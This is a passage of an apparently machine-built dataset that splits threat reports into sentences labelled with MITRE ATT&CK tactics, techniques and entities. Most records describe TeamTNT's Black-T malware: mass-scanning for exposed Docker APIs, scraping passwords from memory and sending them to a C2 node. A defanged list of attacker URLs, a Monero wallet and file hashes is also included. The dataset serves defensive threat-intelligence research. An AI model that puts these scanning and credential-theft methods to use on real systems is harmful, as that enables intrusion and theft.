"page_number": 1, "sentence_id": 58, "context_before": "This is also a new finding related to TeamTNT TTPs (see Figure 10).", "sentence_text": "By expanding the scanning range of Black-T, TeamTNT actors are greatly expanding the scope of their targeting operations.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Expands the scanning range of Black-T to broaden targeting operations", "entities": [ { "text": "Black-T", "start": 35, "end": 42, "label": "MalwareTool" }, { "text": "TeamTNT", "start": 44, "end": 51, "label": "ThreatActor" }, { "text": "expanding the scanning range", "start": 3, "end": 31, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s59-11e849", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "By expanding the scanning range of Black-T, TeamTNT actors are greatly expanding the scope of their targeting operations.", "sentence_text": "Instead of only scanning the local network range of a compromised system, Black-T will begin scanning an entire CIDR 8 network range at random.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Black-T scans an entire CIDR 8 network range at random", "entities": [ { "text": "Black-T", "start": 74, "end": 81, "label": "MalwareTool" }, { "text": "CIDR 8 network range", "start": 112, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "will begin scanning an entire CIDR 8 network range at random", "start": 82, "end": 142, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s60-189acf", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Instead of only scanning the local network range of a compromised system, Black-T will begin scanning an entire CIDR 8 network range at random.", "sentence_text": "For example, if Black-T selects 134.0.0.0/8, any address between 134.0.0.0 and 134.255.255.255 which contains an exposed Docker daemon API will be targeted and Black-T will attempt to exploit that system.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Targets and attempts to exploit systems with exposed Docker daemon APIs", "entities": [ { "text": "134.0.0.0/8", "start": 32, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "Black-T", "start": 16, "end": 23, "label": "MalwareTool" }, { "text": "targeted ", "start": 147, "end": 156, "label": "Action" }, { "text": "attempt to exploit", "start": 173, "end": 191, "label": "Action" }, { "text": "exposed Docker daemon API", "start": 113, "end": 138, "label": "Infrastructure_Indicator" }, { "text": " Black-T", "start": 159, "end": 167, "label": "MalwareTool" } ] }, { "uid": "mitre-76_mitre_report-p1-s61-a45ace", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "For example, if Black-T selects 134.0.0.0/8, any address between 134.0.0.0 and 134.255.255.255 which contains an exposed Docker daemon API will be targeted and Black-T will attempt to exploit that system.", "sentence_text": "Given enough time, every publicly available IP address will be scanned for an exposed Docker daemon API system.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1046", "name": "Network Service Discovery" } ], "procedure": "Scans all publicly available IP addresses for exposed Docker daemon APIs", "entities": [ { "text": "Docker daemon API system", "start": 86, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "publicly available IP address", "start": 25, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "scanned ", "start": 63, "end": 71, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s62-68ce70", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "Given enough time, every publicly available IP address will be scanned for an exposed Docker daemon API system.", "sentence_text": "This has the potential to greatly increase the number of compromised systems owned by TeamTNT actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s63-f95c96", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "This has the potential to greatly increase the number of compromised systems owned by TeamTNT actors.", "sentence_text": "Conclusion\nTeamTNT is a cloud-focused cryptojacking group which targets exposed Docker daemon APIs.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Targets exposed Docker daemon APIs", "entities": [ { "text": "TeamTNT ", "start": 11, "end": 19, "label": "ThreatActor" }, { "text": "exposed Docker daemon APIs", "start": 72, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "targets ", "start": 64, "end": 72, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s64-72d801", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "Conclusion\nTeamTNT is a cloud-focused cryptojacking group which targets exposed Docker daemon APIs.", "sentence_text": "Upon successful identification and exploitation of the Docker daemon API, TeamTNT will drop the new cryptojacking variant Black-T.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Drops Black-T cryptojacking variant after exploiting Docker daemon AP", "entities": [ { "text": "TeamTNT ", "start": 74, "end": 82, "label": "ThreatActor" }, { "text": "Black-T", "start": 122, "end": 129, "label": "MalwareTool" }, { "text": "Docker daemon API", "start": 55, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "identification ", "start": 16, "end": 31, "label": "Action" }, { "text": "exploitation ", "start": 35, "end": 48, "label": "Action" }, { "text": "drop ", "start": 87, "end": 92, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s65-2c87cb", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Upon successful identification and exploitation of the Docker daemon API, TeamTNT will drop the new cryptojacking variant Black-T.", "sentence_text": "Black-T will also perform memory scraping operations following the successful exploitation of the cloud system.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" } ], "procedure": "Performs memory scraping operations after system exploitation", "entities": [ { "text": "Black-T", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "memory scraping", "start": 26, "end": 41, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s66-061a66", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "Black-T will also perform memory scraping operations following the successful exploitation of the cloud system.", "sentence_text": "This is performed via mimipy and mimipenguins scripts, which are downloaded to the compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "download mimipy and mimipenguins scripts to the compromised system", "entities": [ { "text": "mimipy", "start": 22, "end": 28, "label": "MalwareTool" }, { "text": "mimipenguins", "start": 33, "end": 45, "label": "MalwareTool" }, { "text": "downloaded to the compromised system", "start": 65, "end": 101, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s67-ec2e01", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "This is performed via mimipy and mimipenguins scripts, which are downloaded to the compromised system.", "sentence_text": "Any identified passwords are then exfiltrated to a TeamTNT C2 node.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrates identified passwords to TeamTNT C2 node", "entities": [ { "text": "TeamTNT ", "start": 51, "end": 59, "label": "ThreatActor" }, { "text": "C2 node", "start": 59, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "exfiltrated ", "start": 34, "end": 46, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s68-04a2e3", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "Any identified passwords are then exfiltrated to a TeamTNT C2 node.", "sentence_text": "Similar to the stolen AWS credentials also captured by the TeamTNT actors, these credentials are likely to be used for additional operations targeted against the organization managing the compromised Docker API.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Uses stolen credentials for additional operations against the organization", "entities": [ { "text": "AWS credentials", "start": 22, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "TeamTNT ", "start": 59, "end": 67, "label": "ThreatActor" }, { "text": "compromised Docker API", "start": 188, "end": 210, "label": "Infrastructure_Indicator" }, { "text": "used ", "start": 110, "end": 115, "label": "Action" } ] }, { "uid": "mitre-76_mitre_report-p1-s69-0782ac", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "Similar to the stolen AWS credentials also captured by the TeamTNT actors, these credentials are likely to be used for additional operations targeted against the organization managing the compromised Docker API.", "sentence_text": "Leverage Palo Alto Networks Prisma Cloud to secure cloud deployments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s70-192fcd", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "Leverage Palo Alto Networks Prisma Cloud to secure cloud deployments.", "sentence_text": "Install the latest apps and threat definitions on the Palo Alto Networks Next-Generation Firewall Indicators of Compromise URLs hxxps://teamtnt[.]red hxxps://teamtnt[.]red/BLACK-T/beta hxxps://teamtnt[.]red/BLACK-T/CleanUpThisBox hxxps://teamtnt[.]red/BLACK-T/setup/bd hxxps://teamtnt[.]red/BLACK-T/setup/docker-update hxxps://teamtnt[.]red/BLACK-T/setup/hole hxxps://teamtnt[.]red/BLACK-T/setup/kube hxxps://teamtnt[.]red/BLACK-T/setup/tshd hxxps://teamtnt[.]red/BLACK-T/SetUpTheBLACK-T hxxps://teamtnt[.]red/BLACK-T/SystemMod hxxps://teamtnt[.]red/ip_log/getip[.]php hxxps://teamtnt[.]red/only_for_stats/dup[.]php hxxps://teamtnt[.]red/x/getpwds[.]tar[.]gz hxxps://teamtnt[.]red/x/pw hxxps://iplogger[.]org/blahblahblah Monero Mining Pool MoneroOcean[.]stream SHA-256 Hashes Black-T related hashes Mimipy and Mimipenguin Related Hashes Monero Wallet 84xqqFNopNcG7T5AcVyv7LVyrBfQyTVGxMFEL2gsxQ92eNfu6xddkWabA3yKCJmfdaA9jEiCyFqfffKp1nQkgeq2Uu2dhB8 Tags AWS credential stealing Cryptojacking Exposed Docker Daemon API Memory password scraping TeamTnT Threat Research Center", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s71-054166", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "Install the latest apps and threat definitions on the Palo Alto Networks Next-Generation Firewall Indicators of Compromise URLs hxxps://teamtnt[.]red hxxps://teamtnt[.]red/BLACK-T/beta hxxps://teamtnt[.]red/BLACK-T/CleanUpThisBox hxxps://teamtnt[.]red/BLACK-T/setup/bd hxxps://teamtnt[.]red/BLACK-T/setup/docker-update hxxps://teamtnt[.]red/BLACK-T/setup/hole hxxps://teamtnt[.]red/BLACK-T/setup/kube hxxps://teamtnt[.]red/BLACK-T/setup/tshd hxxps://teamtnt[.]red/BLACK-T/SetUpTheBLACK-T hxxps://teamtnt[.]red/BLACK-T/SystemMod hxxps://teamtnt[.]red/ip_log/getip[.]php hxxps://teamtnt[.]red/only_for_stats/dup[.]php hxxps://teamtnt[.]red/x/getpwds[.]tar[.]gz hxxps://teamtnt[.]red/x/pw hxxps://iplogger[.]org/blahblahblah Monero Mining Pool MoneroOcean[.]stream SHA-256 Hashes Black-T related hashes Mimipy and Mimipenguin Related Hashes Monero Wallet 84xqqFNopNcG7T5AcVyv7LVyrBfQyTVGxMFEL2gsxQ92eNfu6xddkWabA3yKCJmfdaA9jEiCyFqfffKp1nQkgeq2Uu2dhB8 Tags AWS credential stealing Cryptojacking Exposed Docker Daemon API Memory password scraping TeamTnT Threat Research Center", "sentence_text": "Next: Unit 42 Discovers 27 New Vulnerabilities Across Microsoft Products Table of Contents Related Articles Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware CloudKeys in the Air: Tracking Malicious Operations of Exposed IAM Keys Why LaZagne Makes D-Bus API Vigilance Crucial Related Cloud Cybersecurity Research Resources Threat Research October 24, 2025 Cloud Discovery With AzureHound Control plane Curious Serpens Data plane Read now Threat Research October 22, 2025 Jingle Thief: Inside a Cloud-Based Gift Card Fraud Campaign CL‑CRI‑1032", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s72-864c4d", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "Next: Unit 42 Discovers 27 New Vulnerabilities Across Microsoft Products Table of Contents Related Articles Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware CloudKeys in the Air: Tracking Malicious Operations of Exposed IAM Keys Why LaZagne Makes D-Bus API Vigilance Crucial Related Cloud Cybersecurity Research Resources Threat Research October 24, 2025 Cloud Discovery With AzureHound Control plane Curious Serpens Data plane Read now Threat Research October 22, 2025 Jingle Thief: Inside a Cloud-Based Gift Card Fraud Campaign CL‑CRI‑1032", "sentence_text": "Phishing Read now Insights October 7, 2025 Responding to Cloud Incidents: A Step-by-Step Guide From the 2025 Unit 42 Global Incident Response Report Cloud Infrastructure Protection Cloud Security Read now Threat Research September 3, 2025 Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust Azure GenAI Google Read now Threat Research July 22, 2025 Cloud Logging for Security and Beyond AWS Azure Cloud Read now Threat Research June 13, 2025 Serverless Tokens in the Cloud: Exploitation and Detections AWS Google Cloud Read now Threat Research June 10, 2025 The Evolution of Linux Binaries in Targeted Cloud Operations Linux Malware Endpoint Read now Threat Research June 9, 2025 Roles Here?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s73-049470", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "Phishing Read now Insights October 7, 2025 Responding to Cloud Incidents: A Step-by-Step Guide From the 2025 Unit 42 Global Incident Response Report Cloud Infrastructure Protection Cloud Security Read now Threat Research September 3, 2025 Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust Azure GenAI Google Read now Threat Research July 22, 2025 Cloud Logging for Security and Beyond AWS Azure Cloud Read now Threat Research June 13, 2025 Serverless Tokens in the Cloud: Exploitation and Detections AWS Google Cloud Read now Threat Research June 10, 2025 The Evolution of Linux Binaries in Targeted Cloud Operations Linux Malware Endpoint Read now Threat Research June 9, 2025 Roles Here?", "sentence_text": "Roles There?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s74-56dfc6", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "Roles There?", "sentence_text": "Misconfigurations in CI/CD JSON Read now Get updates from Unit 42 Peace of mind comes from staying ahead of threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s75-8f5d7c", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "Misconfigurations in CI/CD JSON Read now Get updates from Unit 42 Peace of mind comes from staying ahead of threats.", "sentence_text": "Subscribe today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s76-b0c443", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "Subscribe today.", "sentence_text": "Get the latest news, invites to events, and threat alerts Products and Services AI-Powered Network Security Platform Secure AI by Design Prisma AIRS AI Access Security Cloud Delivered Security Services Advanced Threat Prevention Advanced URL Filtering Advanced WildFire Advanced DNS Security Enterprise Data Loss Prevention Enterprise IoT Security Medical IoT Security Industrial OT Security SaaS Security Next-Generation Firewalls Hardware Firewalls Software Firewalls Strata Cloud Manager SD-WAN for NGFW PAN-OS Panorama Secure Access Service Edge Prisma", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s77-609443", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "Get the latest news, invites to events, and threat alerts Products and Services AI-Powered Network Security Platform Secure AI by Design Prisma AIRS AI Access Security Cloud Delivered Security Services Advanced Threat Prevention Advanced URL Filtering Advanced WildFire Advanced DNS Security Enterprise Data Loss Prevention Enterprise IoT Security Medical IoT Security Industrial OT Security SaaS Security Next-Generation Firewalls Hardware Firewalls Software Firewalls Strata Cloud Manager SD-WAN for NGFW PAN-OS Panorama Secure Access Service Edge Prisma", "sentence_text": "SASE Application Acceleration Autonomous Digital Experience Management Enterprise DLP Prisma Access Prisma Browser Prisma SD-WAN Remote Browser Isolation SaaS Security AI-Driven Security Operations Platform Cloud Security Cortex Cloud Application Security Cloud Posture Security Cloud Runtime Security Prisma Cloud AI-Driven SOC Cortex XSIAM Cortex XDR Cortex XSOAR Cortex Xpanse Managed XSIAM Threat Intel and Incident Response Services Proactive Assessments Incident Response Transform Your Security Strategy Discover Threat Intelligence Company About Us Careers Corporate Responsibility Customers Investor Relations Location Newsroom Popular Links Blog Communities Content Library Cyberpedia Event Center Manage Email Preferences Products A-Z Product Certifications Report a Vulnerability Sitemap Tech Docs Do Not Sell or Share My Personal Information", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s78-2dda62", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "SASE Application Acceleration Autonomous Digital Experience Management Enterprise DLP Prisma Access Prisma Browser Prisma SD-WAN Remote Browser Isolation SaaS Security AI-Driven Security Operations Platform Cloud Security Cortex Cloud Application Security Cloud Posture Security Cloud Runtime Security Prisma Cloud AI-Driven SOC Cortex XSIAM Cortex XDR Cortex XSOAR Cortex Xpanse Managed XSIAM Threat Intel and Incident Response Services Proactive Assessments Incident Response Transform Your Security Strategy Discover Threat Intelligence Company About Us Careers Corporate Responsibility Customers Investor Relations Location Newsroom Popular Links Blog Communities Content Library Cyberpedia Event Center Manage Email Preferences Products A-Z Product Certifications Report a Vulnerability Sitemap Tech Docs Do Not Sell or Share My Personal Information", "sentence_text": "Your browser does not support the video tag.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s79-6a8ddf", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "Your browser does not support the video tag.", "sentence_text": "Default Heading\nRead the article Seekbar Volume [FILTERED_TABLES_START]\nbioset | a5dd446b2a7b8cfd6b6fd4047cc2fddfcea3a4865d8069dcd661e422046de2a1 | Possibly corrupted kube | a506c6cf25de202e6b2bf60fe0236911a6ff8aa33f12a78edad9165ab0851caf | VT = 33/60 kube.jpg tshd | a5e6b084cdabe9a4557b5ff8b2313db6c3bb4ba424d107474024030115eeaa0f | Possibly Corrupt VT = 1/60 docker-update", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s80-a01dde", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "Default Heading\nRead the article Seekbar Volume [FILTERED_TABLES_START]\nbioset | a5dd446b2a7b8cfd6b6fd4047cc2fddfcea3a4865d8069dcd661e422046de2a1 | Possibly corrupted kube | a506c6cf25de202e6b2bf60fe0236911a6ff8aa33f12a78edad9165ab0851caf | VT = 33/60 kube.jpg tshd | a5e6b084cdabe9a4557b5ff8b2313db6c3bb4ba424d107474024030115eeaa0f | Possibly Corrupt VT = 1/60 docker-update", "sentence_text": "| 139f393594aabb20543543bd7d3192422b886f58e04a910637b41f14d0cad375", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s81-bb0a71", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "| 139f393594aabb20543543bd7d3192422b886f58e04a910637b41f14d0cad375", "sentence_text": "| VT = 35/60 default.jpg 90c74c9ff4c502e155d2dc72f3f6c3f512d354d71b5c480c89b6c1b1852bcb1f | bd.bin 1cf803a8dd2a41c4b976106b0ceb2376f46bafddeafbcef6ff0c312fc78e09da | beta.bin a5dd446b2a7b8cfd6b6fd4047cc2fddfcea3a4865d8069dcd661e422046de2a1 | bioset.bin 9f8cb3f25a8b321b86ee52c16b03b3118f3b157b33e29899d265da3433a02c79 | SetUpTheBLACK-T.bin 6c16473060ffd9e215ee8fc82ff430384a8b99ea85000486f363e9bff062898d | cleanupthisbox.bin 139f393594aabb20543543bd7d3192422b886f58e04a910637b41f14d0cad375 | docker-update.bin 5b417032a80ddf4d9132a3d7d97027eeb08d9b94b89f5128863930c1967c84c4 | getpwds.tar.gz e92b19f535fa57574401b6cdbf511a234a0b19335bd2ad6751839c718dc68e4d | gimmecredz.sh a506c6cf25de202e6b2bf60fe0236911a6ff8aa33f12a78edad9165ab0851caf | kube.bin c0069aab1125a8ac1b9207e56371e86693b26b0dcab1630f337be55929b36a2a | pw.bin fae2f1399282508a4f01579ad617d9db939d0117e3b2fcfcc48ae4bef59540d9 | sbin_u 84fabfbbd134bbeeb5481a96b023f44a671382349e5b39928baf0e80e28fd599 | setup_moneroocean_miner.bin", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s82-caf007", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "| VT = 35/60 default.jpg 90c74c9ff4c502e155d2dc72f3f6c3f512d354d71b5c480c89b6c1b1852bcb1f | bd.bin 1cf803a8dd2a41c4b976106b0ceb2376f46bafddeafbcef6ff0c312fc78e09da | beta.bin a5dd446b2a7b8cfd6b6fd4047cc2fddfcea3a4865d8069dcd661e422046de2a1 | bioset.bin 9f8cb3f25a8b321b86ee52c16b03b3118f3b157b33e29899d265da3433a02c79 | SetUpTheBLACK-T.bin 6c16473060ffd9e215ee8fc82ff430384a8b99ea85000486f363e9bff062898d | cleanupthisbox.bin 139f393594aabb20543543bd7d3192422b886f58e04a910637b41f14d0cad375 | docker-update.bin 5b417032a80ddf4d9132a3d7d97027eeb08d9b94b89f5128863930c1967c84c4 | getpwds.tar.gz e92b19f535fa57574401b6cdbf511a234a0b19335bd2ad6751839c718dc68e4d | gimmecredz.sh a506c6cf25de202e6b2bf60fe0236911a6ff8aa33f12a78edad9165ab0851caf | kube.bin c0069aab1125a8ac1b9207e56371e86693b26b0dcab1630f337be55929b36a2a | pw.bin fae2f1399282508a4f01579ad617d9db939d0117e3b2fcfcc48ae4bef59540d9 | sbin_u 84fabfbbd134bbeeb5481a96b023f44a671382349e5b39928baf0e80e28fd599 | setup_moneroocean_miner.bin", "sentence_text": "06e9cb770c61279e91adb5723f297d472a42568936199aef9251a27568fd119f | systemmod.bin a5e6b084cdabe9a4557b5ff8b2313db6c3bb4ba424d107474024030115eeaa0f | tshd.bin 79b478d9453cb18d2baf4387b65dc01b6a4f66a620fa6348fa8dbb8549a04a20 | mimipenguin.py 3acfe74cd2567e9cc60cb09bc4d0497b81161075510dd75ef8363f72c49e1789 | mimipenguin.sh", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s83-660a9a", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "06e9cb770c61279e91adb5723f297d472a42568936199aef9251a27568fd119f | systemmod.bin a5e6b084cdabe9a4557b5ff8b2313db6c3bb4ba424d107474024030115eeaa0f | tshd.bin 79b478d9453cb18d2baf4387b65dc01b6a4f66a620fa6348fa8dbb8549a04a20 | mimipenguin.py 3acfe74cd2567e9cc60cb09bc4d0497b81161075510dd75ef8363f72c49e1789 | mimipenguin.sh", "sentence_text": "73a956f40d51da737a74c8ad4ecbfab12350621ffc167b5c278cd33ce9e0e0f0 | mimipy.py b9b3a97ed5c335b61f2cc9783cb8f24c9cff741d020b850502542dbd81c2c2df | pack.py 1f09ccae15d8d452bde39f7ada9660df3cf0598137c5ac7a47027d8b9107415d", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s84-4f9aa6", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "73a956f40d51da737a74c8ad4ecbfab12350621ffc167b5c278cd33ce9e0e0f0 | mimipy.py b9b3a97ed5c335b61f2cc9783cb8f24c9cff741d020b850502542dbd81c2c2df | pack.py 1f09ccae15d8d452bde39f7ada9660df3cf0598137c5ac7a47027d8b9107415d", "sentence_text": "| pupyimporter.py 023283c035a98fcb0b4d32bc103a44df5844c5e41c82261e0d029180cde58835", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s85-4cc611", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "| pupyimporter.py 023283c035a98fcb0b4d32bc103a44df5844c5e41c82261e0d029180cde58835", "sentence_text": "| dbg.h a0d4cbbb61e3b900a990a2b06282989c70d5d7cb93052ad7ec04dcd64701d929 | max.h 6cbf056fe35f1a809b8e8a2a5fc1f808bb4366e6e1ca2767fb82832d60c9ecf8 | scanner.h 9469e2937be4cf37e443ba263ffc1ee9aa1cf6b6a839ad60e3ecfe3e9e1bc24e | targets.h 9703cd1d00bf6f55b5becb1dd87ffcbd98b2ac791c152f7adcb728c5512df5e2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-76_mitre_report-p1-s86-43ba91", "source": "mitre", "doc_id": "76_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "| dbg.h a0d4cbbb61e3b900a990a2b06282989c70d5d7cb93052ad7ec04dcd64701d929 | max.h 6cbf056fe35f1a809b8e8a2a5fc1f808bb4366e6e1ca2767fb82832d60c9ecf8 | scanner.h 9469e2937be4cf37e443ba263ffc1ee9aa1cf6b6a839ad60e3ecfe3e9e1bc24e | targets.h 9703cd1d00bf6f55b5becb1dd87ffcbd98b2ac791c152f7adcb728c5512df5e2", "sentence_text": "| users.h 88226956193afb5e5250639bd62305afde125a658b7e924ce5a5845d08f7de08 | mimipenguin.c 54d7524c73edbd9fe3cfa962656db23d6a2d8e4ebc6a58b116b3b78d732acfdf | scanner.c ac54934dd9b3b55296baf3e4d1aec959f540bed71d02a6f624edab281a719bdf | targets.c 00f116b831f720b62acf3a2d0db2a870b6ae114c4f9b3b517362a49c42c5a6f3 | users.c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s1-63c3eb", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "CactusPete APT group’s updated Bisonal backdoor | Securelist Dark mode off Login Securelist menu English Russian Spanish Brazil Existing Customers Personal My Kaspersky Renew your product Update your product Customer support Business KSOS portal Kaspersky Business Hub Technical Support Knowledge Base Renew License Home Products", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s2-9a0c13", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "CactusPete APT group’s updated Bisonal backdoor | Securelist Dark mode off Login Securelist menu English Russian Spanish Brazil Existing Customers Personal My Kaspersky Renew your product Update your product Customer support Business KSOS portal Kaspersky Business Hub Technical Support Knowledge Base Renew License Home Products", "sentence_text": "Trials&Update Resource Center Business Kaspersky Next Small Business (1-50 employees)\nMedium Business (51-999 employees)\nEnterprise (1000+ employees)\nSecurelist\nThreats\nFinancial threats\nMobile threats\nWeb threats\nSecure environment (IoT)\nVulnerabilities and exploits Spam and Phishing Industrial threats Categories APT reports Incidents Research Malware reports Spam and phishing reports", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s3-11f6ea", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Trials&Update Resource Center Business Kaspersky Next Small Business (1-50 employees)\nMedium Business (51-999 employees)\nEnterprise (1000+ employees)\nSecurelist\nThreats\nFinancial threats\nMobile threats\nWeb threats\nSecure environment (IoT)\nVulnerabilities and exploits Spam and Phishing Industrial threats Categories APT reports Incidents Research Malware reports Spam and phishing reports", "sentence_text": "Publications Kaspersky Security Bulletin Archive All Tags APT Logbook Webinars Statistics Encyclopedia Threats descriptions KSB 2021 About Us Company Transparency Corporate News Press Center Careers Sponsorships Policy Blog Partners Find a Partner Partner Program Content menu Close Subscribe Table of Contents", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s4-554096", "source": "mitre", "doc_id": "77_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "Publications Kaspersky Security Bulletin Archive All Tags APT Logbook Webinars Statistics Encyclopedia Threats descriptions KSB 2021 About Us Company Transparency Corporate News Press Center Careers Sponsorships Policy Blog Partners Find a Partner Partner Program Content menu Close Subscribe Table of Contents", "sentence_text": "What are they looking for?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-77_mitre_report-p1-s5-f74d03", "source": "mitre", "doc_id": "77_mitre_report", 